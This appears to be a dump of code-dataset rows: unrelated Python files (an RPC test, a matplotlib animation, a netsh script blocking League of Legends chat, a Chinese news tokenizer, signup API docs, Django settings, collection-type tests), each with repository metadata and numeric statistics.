decrypted = smessage.sverify(public_key, decoded)
print(decrypted.decode('utf-8'))
else:
print('Wrong command, use <enc | dev | sign | verify>')
exit(1)
| 33.288136
| 109
| 0.726578
| 277
| 1,964
| 5.043321
| 0.422383
| 0.057266
| 0.045812
| 0.048676
| 0.280601
| 0.263422
| 0.168933
| 0.108805
| 0.108805
| 0.108805
| 0
| 0.019289
| 0.155295
| 1,964
| 58
| 110
| 33.862069
| 0.822785
| 0.283605
| 0
| 0.285714
| 0
| 0.028571
| 0.145219
| 0.015816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085714
| 0
| 0.085714
| 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a50848a3ac961cc89962bc6f936cbbfc7cd63c
| 819
|
py
|
Python
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 1,410
|
2015-01-02T14:55:07.000Z
|
2022-03-28T17:22:06.000Z
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 194
|
2015-01-22T06:18:24.000Z
|
2020-10-20T21:21:58.000Z
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 168
|
2015-01-31T10:29:55.000Z
|
2022-03-14T10:22:24.000Z
|
'''Tests the rpc middleware and utilities. It uses the calculator example.'''
import unittest
from pulsar.apps import rpc
from pulsar.apps.http import HttpWsgiClient
class rpcTest(unittest.TestCase):
def proxy(self):
from examples.calculator.manage import Site
http = HttpWsgiClient(Site())
return rpc.JsonProxy('http://127.0.0.1:8060/', http=http, timeout=20)
def test_proxy(self):
p = self.proxy()
http = p.http
self.assertTrue(len(http.headers))
self.assertEqual(http.headers['user-agent'], 'Pulsar-Http-Wsgi-Client')
self.assertTrue(http.wsgi_callable)
self.assertEqual(p._version, '2.0')
async def test_addition(self):
p = self.proxy()
response = await p.calc.add(4, 5)
self.assertEqual(response, 9)
| 30.333333
| 79
| 0.660562
| 108
| 819
| 4.972222
| 0.518519
| 0.083799
| 0.052142
| 0.052142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02648
| 0.216117
| 819
| 26
| 80
| 31.5
| 0.809969
| 0.086691
| 0
| 0.105263
| 0
| 0
| 0.078167
| 0.030997
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a9377893db4fc2f5048d2336cea72ff934579e
| 888
|
py
|
Python
|
code/animation/sine-cosine.py
|
geo7/scientific-visualization-book
|
71f6bac4db7ee2f26e88052fe7faa800303d8b00
|
[
"BSD-2-Clause"
] | 2
|
2021-11-17T15:10:09.000Z
|
2021-12-24T13:31:10.000Z
|
code/animation/sine-cosine.py
|
WuShichao/scientific-visualization-book
|
389766215aa6b234ed1cf560a3768437d41d1d37
|
[
"BSD-2-Clause"
] | 1
|
2021-12-12T11:37:48.000Z
|
2021-12-12T11:39:00.000Z
|
code/animation/sine-cosine.py
|
WuShichao/scientific-visualization-book
|
389766215aa6b234ed1cf560a3768437d41d1d37
|
[
"BSD-2-Clause"
] | 2
|
2021-12-30T12:20:07.000Z
|
2022-02-24T06:36:41.000Z
|
# ----------------------------------------------------------------------------
# Title: Scientific Visualisation - Python & Matplotlib
# Author: Nicolas P. Rougier
# License: BSD
# ----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
fig = plt.figure(figsize=(7, 2))
ax = plt.subplot()
X = np.linspace(-np.pi, np.pi, 256, endpoint=True)
C, S = np.cos(X), np.sin(X)
(line1,) = ax.plot(X, C, marker="o", markevery=[-1], markeredgecolor="white")
(line2,) = ax.plot(X, S, marker="o", markevery=[-1], markeredgecolor="white")
def update(frame):
line1.set_data(X[:frame], C[:frame])
line2.set_data(X[:frame], S[:frame])
plt.tight_layout()
ani = animation.FuncAnimation(fig, update, interval=10)
plt.savefig("../../figures/animation/sine-cosine.pdf")
plt.show()
| 31.714286
| 78
| 0.566441
| 110
| 888
| 4.545455
| 0.554545
| 0.064
| 0.028
| 0.068
| 0.148
| 0.148
| 0
| 0
| 0
| 0
| 0
| 0.016393
| 0.106982
| 888
| 27
| 79
| 32.888889
| 0.614124
| 0.281532
| 0
| 0
| 0
| 0
| 0.080696
| 0.061709
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.1875
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ab2de7a369fd311ec763905e71a9bc7d4f2e49
| 2,773
|
py
|
Python
|
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
import yaml
import socket
import subprocess, ctypes, os, sys
from subprocess import Popen, DEVNULL
def read_yaml(file_path):
with open(file_path, "r") as f:
return yaml.safe_load(f)
def check_admin():
""" Force to start application with admin rights """
try:
isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
except AttributeError:
isAdmin = False
if not isAdmin:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
def check_for_firewall_rule(firewall_rule_name):
""" Check for existing rule in Windows Firewall """
print("Checking to see if firewall rule exists")
x = subprocess.call(
f"netsh advfirewall firewall show rule {firewall_rule_name}",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
if x == 0:
print(F"Rule exists.")
return True
else:
print(F"Rule does not exist.")
return False
def add_or_modify_rule(firewall_rule_name, state, firewall_exists, ip):
""" Add Rule if the rule doesn't already exist. Delete the rule if the rule exists. """
if firewall_exists and state == 1:
delete_rule(firewall_rule_name)
add_rule(firewall_rule_name, ip)
if firewall_exists and state == 0:
delete_rule(firewall_rule_name)
if not firewall_exists and state == 1:
add_rule(firewall_rule_name, ip)
if not firewall_exists and state == 0:
print("Firewall rule does not exist, and `block chat` is set to disabled")
def delete_rule(firewall_rule_name):
subprocess.call(
f"netsh advfirewall firewall delete rule name={firewall_rule_name}",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
print(f"Rule '{firewall_rule_name}' deleted")
def add_rule(firewall_rule_name, ip):
""" Add rule to Windows Firewall """
subprocess.call(
f"netsh advfirewall firewall add rule name={firewall_rule_name} dir=out action=block remoteip={ip} protocol=TCP",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
print(f"Current League of Legends Chat IP Address: {ip}. \nRule {firewall_rule_name} added. ")
if __name__ == '__main__':
config = read_yaml(".\config.yaml")
state = config['config']['block_chat']
firewall_rule_name = config['config']['firewall_rule_name']
lol_config_file = config['config']['dir']
region = config['config']['region']
lol_config = read_yaml(lol_config_file)
host = lol_config['region_data'][region]['servers']['chat']['chat_host']
ip = socket.gethostbyname(host)
check_admin()
firewall_exists = check_for_firewall_rule(firewall_rule_name)
add_or_modify_rule(firewall_rule_name, state, firewall_exists, ip)
| 36.012987
| 121
| 0.679769
| 371
| 2,773
| 4.843666
| 0.285714
| 0.140234
| 0.151363
| 0.133556
| 0.407902
| 0.318865
| 0.210907
| 0.14079
| 0.114636
| 0.057874
| 0
| 0.004608
| 0.217454
| 2,773
| 77
| 122
| 36.012987
| 0.823502
| 0.072124
| 0
| 0.227273
| 0
| 0.015152
| 0.237049
| 0.028257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.060606
| 0
| 0.19697
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ac260681c50b787cb8306fb30da9bc778c277f
| 5,623
|
py
|
Python
|
src/Leorio/tokenization.py
|
majiajue/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 635
|
2018-02-25T08:45:06.000Z
|
2022-03-30T10:05:23.000Z
|
src/Leorio/tokenization.py
|
NongMaYiSheng/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 5
|
2018-10-29T16:21:28.000Z
|
2022-01-03T12:59:28.000Z
|
src/Leorio/tokenization.py
|
NongMaYiSheng/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 216
|
2018-02-26T09:27:15.000Z
|
2022-03-30T10:05:26.000Z
|
import __init__
from Kite.database import Database
from Kite import config
from Kite import utils
import jieba
import pkuseg
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
class Tokenization(object):
def __init__(self, import_module="jieba", user_dict=None, chn_stop_words_dir=None):
#self.database = Database().conn[config.DATABASE_NAME] #.get_collection(config.COLLECTION_NAME_CNSTOCK)
self.database = Database()
self.import_module = import_module
self.user_dict = user_dict
if self.user_dict:
self.update_user_dict(self.user_dict)
if chn_stop_words_dir:
self.stop_words_list = utils.get_chn_stop_words(chn_stop_words_dir)
else:
self.stop_words_list = list()
def update_user_dict(self, old_user_dict_dir, new_user_dict_dir=None):
# 将缺失的(或新的)股票名称、金融新词等,添加进金融词典中
word_list = []
with open(old_user_dict_dir, "r", encoding="utf-8") as file:
for row in file:
word_list.append(row.split("\n")[0])
name_code_df = self.database.get_data(config.STOCK_DATABASE_NAME,
config.COLLECTION_NAME_STOCK_BASIC_INFO,
keys=["name", "code"])
new_words_list = list(set(name_code_df["name"].tolist()))
for word in new_words_list:
if word not in word_list:
word_list.append(word)
new_user_dict_dir = old_user_dict_dir if not new_user_dict_dir else new_user_dict_dir
with open(new_user_dict_dir, "w", encoding="utf-8") as file:
for word in word_list:
file.write(word + "\n")
def cut_words(self, text):
outstr = list()
sentence_seged = None
if self.import_module == "jieba":
if self.user_dict:
jieba.load_userdict(self.user_dict)
sentence_seged = list(jieba.cut(text))
elif self.import_module == "pkuseg":
seg = pkuseg.pkuseg(user_dict=self.user_dict) # 添加自定义词典
sentence_seged = seg.cut(text) # 进行分词
if sentence_seged:
for word in sentence_seged:
if word not in self.stop_words_list \
and word != "\t" \
and word != " " \
and utils.is_contain_chn(word)\
and len(word) > 1:
outstr.append(word)
return outstr
else:
return False
def find_relevant_stock_codes_in_article(self, article, stock_name_code_dict):
stock_codes_set = list()
cut_words_list = self.cut_words(article)
if cut_words_list:
for word in cut_words_list:
try:
stock_codes_set.append(stock_name_code_dict[word])
except Exception:
pass
return list(set(stock_codes_set))
def update_news_database_rows(self,
database_name,
collection_name,
incremental_column_name="RelatedStockCodes"):
name_code_df = self.database.get_data(config.STOCK_DATABASE_NAME,
config.COLLECTION_NAME_STOCK_BASIC_INFO,
keys=["name", "code"])
name_code_dict = dict(name_code_df.values)
data = self.database.get_collection(database_name, collection_name).find()
for row in data:
# if row["Date"] > "2019-05-20 00:00:00":
# 在新增数据中,并不存在更新列,但是旧数据中已存在更新列,因此需要
# 判断数据结构中是否包含该incremental_column_name字段
if incremental_column_name not in row.keys():
related_stock_codes_list = self.find_relevant_stock_codes_in_article(
row["Article"], name_code_dict)
self.database.update_row(database_name,
collection_name,
{"_id": row["_id"]},
{incremental_column_name: " ".join(related_stock_codes_list)}
)
logging.info("[{} -> {} -> {}] updated {} key value ... "
.format(database_name, collection_name, row["Date"], incremental_column_name))
else:
logging.info("[{} -> {} -> {}] has already existed {} key value ... "
.format(database_name, collection_name, row["Date"], incremental_column_name))
if __name__ == "__main__":
tokenization = Tokenization(import_module="jieba",
user_dict="financedict.txt",
chn_stop_words_dir="chnstopwords.txt")
# documents_list = \
# [
# "中央、地方支持政策频出,煤炭行业站上了风口 券商研报浩如烟海,投资线索眼花缭乱,\
# 第一财经推出《一财研选》产品,挖掘研报精华,每期梳理5条投资线索,便于您短时间内获\
# 取有价值的信息。专业团队每周日至每周四晚8点准时“上新”,助您投资顺利!",
# "郭文仓到重点工程项目督导检查 2月2日,公司党委书记、董事长、总经理郭文仓,公司董事,\
# 股份公司副总经理、总工程师、郭毅民,股份公司副总经理张国富、柴高贵及相关单位负责人到\
# 焦化厂煤场全封闭和干熄焦等重点工程项目建设工地督导检查施工进度和安全工作情况。"
# ]
# for text in documents_list:
# cut_words_list = tokenization.cut_words(text)
# print(cut_words_list)
# tokenization.update_news_database_rows(config.DATABASE_NAME, "jrj")
| 44.626984
| 112
| 0.560377
| 617
| 5,623
| 4.776337
| 0.277147
| 0.054293
| 0.029861
| 0.023753
| 0.178487
| 0.147947
| 0.112657
| 0.112657
| 0.112657
| 0.112657
| 0
| 0.005982
| 0.345901
| 5,623
| 125
| 113
| 44.984
| 0.795269
| 0.135515
| 0
| 0.157895
| 0
| 0.010526
| 0.066529
| 0.005992
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.010526
| 0.126316
| 0
| 0.221053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ade7f8dfd3c3fdb9f4bfa3e09536d509c88764
| 2,659
|
py
|
Python
|
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
from app.docs import SAMPLE_OBJECT_IDS
ID_DUPLICATION_CHECK_GET = {
'tags': ['회원가입'],
'description': '이메일이 이미 가입되었는지를 체크(중복체크)합니다.',
'parameters': [
{
'name': 'email',
'description': '중복을 체크할 이메일',
'in': 'path',
'type': 'str',
'required': True
}
],
'responses': {
'200': {
'description': '중복되지 않음',
},
'409': {
'description': '중복됨'
}
}
}
SIGNUP_POST = {
'tags': ['회원가입'],
'description': '회원가입합니다.',
'parameters': [
{
'name': 'email',
'description': '이메일',
'in': 'json',
'type': 'str',
'required': True
},
{
'name': 'pw',
'description': '비밀번호',
'in': 'json',
'type': 'str',
'required': True
}
],
'responses': {
'201': {
'description': '회원가입 성공, 인증 이메일 발송 완료. 기본 정보 초기화 액티비티로 이동하면 됩니다. 인증 이메일의 유효 시간은 5분입니다.',
},
'409': {
'description': '이메일 중복됨'
}
}
}
EMAIL_RESEND_GET = {
'tags': ['회원가입'],
'description': '인증 메일을 재전송합니다.',
'parameters': [
{
'name': 'email',
'description': '인증 메일을 재전송할 이메일',
'in': 'path',
'type': 'str',
'required': True
}
],
'responses': {
'200': {
'description': '이메일 재전송 성공',
},
'204': {
'description': '가입되지 않은 이메일'
}
}
}
INITIALIZE_INFO_POST = {
'tags': ['회원가입'],
'description': '기본 정보를 업로드합니다.',
'parameters': [
{
'name': 'email',
'description': '기본 정보 업로드 대상 이메일',
'in': 'path',
'type': 'str',
'required': True
},
{
'name': 'nickname',
'description': '닉네임',
'in': 'json',
'type': 'str',
'required': True
},
{
'name': 'categories',
'description': '관심사 ID 목록 ex) ["{}"], ["{}"], ["{}"]'.format(*SAMPLE_OBJECT_IDS),
'in': 'json',
'type': 'list',
'required': True
}
],
'responses': {
'201': {
'description': '업로드 성공',
},
'204': {
'description': '가입되지 않은 이메일'
},
'400': {
'description': '관심사 ID 중 존재하지 않는 관심사가 존재함'
},
'401': {
'description': '이메일 인증되지 않음'
},
'409': {
'description': '닉네임이 중복됨'
}
}
}
| 22.158333
| 100
| 0.371944
| 205
| 2,659
| 4.765854
| 0.439024
| 0.085977
| 0.092119
| 0.116684
| 0.332651
| 0.269191
| 0.192426
| 0.104401
| 0.104401
| 0.104401
| 0
| 0.023224
| 0.449417
| 2,659
| 119
| 101
| 22.344538
| 0.644126
| 0
| 0
| 0.443478
| 0
| 0.008696
| 0.345995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008696
| 0
| 0.008696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b1ab4a72c456e8f8edbf2cf4dc0a0cd36b09d4
| 517
|
py
|
Python
|
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
# my_lambdata/my_mod.py
def enlarge(n):
"""
Param n is a number
Function will enlarge the number
"""
return n * 100
# this code breakes our ability to omport enlarge from other files
# print("HELLO")
# y = int(input("Please choose a number"))
# print(y, enlarge(y))
if __name__ == "__main__":
# only runs the code IF script is invoked from the command-line
# not if it is imported from another
print("HELLO")
y = int(input("Please choose a number"))
print(y, enlarge(y))
| 21.541667
| 67
| 0.651838
| 80
| 517
| 4.0875
| 0.575
| 0.06422
| 0.067278
| 0.085627
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0
| 0.007614
| 0.237911
| 517
| 23
| 68
| 22.478261
| 0.822335
| 0.60735
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b2a19329a06c11a7f27402a51fc753d23d3562
| 1,291
|
py
|
Python
|
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | null | null | null |
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | 1
|
2021-11-29T03:38:21.000Z
|
2021-11-29T03:38:21.000Z
|
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | 13
|
2021-11-06T03:17:45.000Z
|
2021-12-02T15:12:54.000Z
|
# -*- coding: utf-8 -*-
"""
Author:by 王林清 on 2021/11/2 13:02
FileName:ci.py in shiyizhonghua_resource
Tools:PyCharm python3.8.4
"""
from util import get_time_str, get_json, get_file_path, save_json, \
save_split_json
if __name__ == '__main__':
dir_name = r'./../data/ci'
authors = {}
ci_jsons = []
paths = get_file_path(dir_name)
author_path = paths.pop(0)
author_dicts = get_json(author_path)
for author in author_dicts:
name = author['name']
authors[name] = {
'name': name,
'time': '宋',
'desc': author['description'],
}
for path in paths:
try:
ci_json = get_json(path)
for ci in ci_json:
time = get_time_str()
ci_jsons.append(
{
'title': ci['rhythmic'],
'author': authors[ci['author']],
'type': '词',
'content': ci['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
}
)
except Exception as ex:
print(f'{path}:{ex}')
save_split_json('ci', ci_jsons)
| 26.346939
| 68
| 0.473277
| 141
| 1,291
| 4.056738
| 0.48227
| 0.036713
| 0.034965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020752
| 0.402789
| 1,291
| 48
| 69
| 26.895833
| 0.721141
| 0.0945
| 0
| 0
| 0
| 0
| 0.122308
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b2a9e556e312a49635b929210b47f14c9cd821
| 2,307
|
py
|
Python
|
tools/pfif-tools/app/settings.py
|
priyanshu-kumar02/personfinder
|
d5390b60709cd0ccaaade9a3b6224a60cd523ed9
|
[
"Apache-2.0"
] | 561
|
2015-02-16T07:59:42.000Z
|
2022-03-30T17:31:21.000Z
|
tools/pfif-tools/app/settings.py
|
Anthonymcqueen21/personfinder
|
ee7791fbc434eb4ec5cfad449288a1e884db5b1e
|
[
"Apache-2.0"
] | 591
|
2015-01-30T05:09:30.000Z
|
2022-02-26T09:31:25.000Z
|
tools/pfif-tools/app/settings.py
|
Anthonymcqueen21/personfinder
|
ee7791fbc434eb4ec5cfad449288a1e884db5b1e
|
[
"Apache-2.0"
] | 258
|
2015-01-25T18:35:12.000Z
|
2021-12-25T01:44:14.000Z
|
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# If we actually did anything that used the secret key we'd need to set it to
# some constant value and find a way to secretly store it. However, pfif-tools
# doesn't use it for anything. We need to set it to something to make Django
# happy though, and we set it to something random to be safe in case we
# unknowingly do something in the future that uses it (better to have a password
# reset token break because this changed or something like that than a security
# hole we don't know about).
SECRET_KEY = os.urandom(30)
if 'Development' in os.environ.get('SERVER_SOFTWARE', ''):
DEBUG = True
# If DEBUG is True and ALLOWED_HOSTS is empty, Django permits localhost.
ALLOWED_HOSTS = []
else:
DEBUG = False
ALLOWED_HOSTS = ['pfif-tools.appspot.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['resources'],
'APP_DIRS': False,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Internationalization
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
| 26.825581
| 80
| 0.706545
| 313
| 2,307
| 5.134185
| 0.584665
| 0.037337
| 0.013068
| 0.019913
| 0.036092
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007605
| 0.201994
| 2,307
| 85
| 81
| 27.141176
| 0.865291
| 0.513654
| 0
| 0
| 0
| 0
| 0.391067
| 0.28897
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026316
| 0
| 0.026316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b4ec64c6302ef8adda35ec81fbd48bb0e0a469
| 2,379
|
py
|
Python
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 190
|
2017-05-25T11:57:15.000Z
|
2022-03-17T01:44:53.000Z
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 42
|
2017-06-11T14:05:11.000Z
|
2021-12-14T21:12:07.000Z
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 18
|
2018-01-05T08:47:30.000Z
|
2022-01-28T06:24:05.000Z
|
# coding=utf-8
from related.types import TypedSequence, TypedMapping, TypedSet, ImmutableDict
from attr.exceptions import FrozenInstanceError
from related.converters import str_if_not_none
from collections import OrderedDict
import pytest
def test_immutable_dict():
immutable = ImmutableDict(dict(a=1))
with pytest.raises(FrozenInstanceError):
del immutable['a']
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable['b'] = 2
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.clear()
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.pop('a')
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.something = 0
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
del immutable.something_else
assert immutable == dict(a=1)
def test_str_if_not_none():
unicode_value = "Registered Trademark ®"
assert unicode_value == str_if_not_none(unicode_value)
assert "1" == str_if_not_none(1)
assert str_if_not_none(None) is None
def test_sequence():
lst = ["a", "b", "c"]
seq = TypedSequence(str, lst)
assert seq == lst
assert str(seq) == str(lst)
assert repr(seq) == repr(lst)
assert len(seq) == len(lst)
del seq[1]
del lst[1]
assert seq == lst
seq[1] = "d"
assert seq != lst
with pytest.raises(TypeError):
seq[1] = 4.0
def test_mapping():
dct = OrderedDict(a=1, b=2, c=3)
map = TypedMapping(int, dct)
assert map == dct
assert str(map) == str(dct)
assert repr(map) == repr(dct)
assert len(map) == len(dct)
del map["b"]
del dct["b"]
assert map == dct
with pytest.raises(TypeError):
map["d"] = 4.0
with pytest.raises(TypeError):
map.add(5)
map.add(4, 'd')
dct['d'] = 4
assert map == dct
def test_set():
orig = {"a", "b", "c"}
typed = TypedSet(str, orig)
assert orig == typed
assert len(orig) == len(typed)
assert 'a' in str(typed)
assert 'a' in repr(typed)
typed.add("d")
assert "d" in typed
assert orig != typed
typed.discard("d")
assert "d" not in typed
assert orig == typed
with pytest.raises(TypeError):
typed.add(5)
| 21.432432
| 78
| 0.628415
| 322
| 2,379
| 4.568323
| 0.204969
| 0.067981
| 0.10877
| 0.040789
| 0.375255
| 0.292998
| 0.260367
| 0.260367
| 0.260367
| 0.17811
| 0
| 0.015008
| 0.2438
| 2,379
| 110
| 79
| 21.627273
| 0.802112
| 0.005044
| 0
| 0.302632
| 0
| 0
| 0.018605
| 0
| 0
| 0
| 0
| 0
| 0.381579
| 1
| 0.065789
| false
| 0
| 0.065789
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b6a45922cec7be62ee13004dcced019e40a855
| 2,203
|
py
|
Python
|
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
def inicio():
print('\033[33m=' * 60)
print('MENU PRINCIPAL'.center(50))
print('=' * 60)
